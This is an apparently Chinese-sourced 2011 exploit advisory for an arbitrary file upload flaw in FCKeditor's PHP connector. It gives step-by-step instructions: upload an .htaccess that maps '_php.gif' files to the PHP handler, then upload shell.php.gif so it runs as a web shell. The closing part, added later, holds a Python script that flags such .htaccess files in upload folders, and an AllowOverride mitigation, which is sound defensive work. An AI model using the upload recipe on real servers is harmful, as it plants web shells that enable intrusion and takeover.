FCKeditor Upload Vulnerability in All PHP Versions
Author: Anonymous  Source: Compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all version Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name “shell.php.gif” changes to “shell_php.gif” automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
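
A defender-side check for the steps above, added here as an example (not part of the original advisory): it walks an upload directory, reports any .htaccess that assigns a PHP or CGI handler, and lists the files its FilesMatch patterns cover. The directory layout and file names created by build_sample are constructed, and only files in the same folder as the .htaccess are checked.

```python
import os
import re
import tempfile

# Handler assignments that make Apache execute a file as PHP or CGI.
HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\s+\S*(php|cgi)", re.I)
FILESMATCH_RE = re.compile(r"^\s*<FilesMatch\s+[\"']?(.+?)[\"']?\s*>", re.I)

def _covers(pattern, name):
    try:
        return re.search(pattern, name) is not None
    except re.error:  # Apache uses PCRE; Python may reject some patterns
        return False

def audit_upload_dir(root):
    """Report every .htaccess under root that assigns a PHP/CGI handler."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
        directives = [ln.strip() for ln in lines if HANDLER_RE.match(ln)]
        if not directives:
            continue
        patterns = [m.group(1) for ln in lines if (m := FILESMATCH_RE.match(ln))]
        # Only files beside the .htaccess are checked, not subdirectories.
        affected = sorted(f for f in files if f != ".htaccess"
                          and any(_covers(p, f) for p in patterns))
        findings.append({"htaccess": path, "directives": directives,
                         "patterns": patterns, "affected": affected})
    return findings

def build_sample(root):
    """Constructed sample tree: one tampered upload folder, one clean one."""
    bad = os.path.join(root, "userfiles", "image")
    ok = os.path.join(root, "userfiles", "file")
    for d, names in ((bad, ["shell_php.gif", "logo.gif"]), (ok, ["a.gif"])):
        os.makedirs(d)
        for name in names:
            open(os.path.join(d, name), "wb").close()
    with open(os.path.join(bad, ".htaccess"), "w") as fh:
        fh.write('<FilesMatch "_php.gif">\n'
                 'SetHandler application/x-httpd-php\n</FilesMatch>\n')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(audit_upload_dir(tmp))
```

Setting AllowOverride None on the upload directory in the main Apache configuration makes the server ignore an uploaded .htaccess altogether.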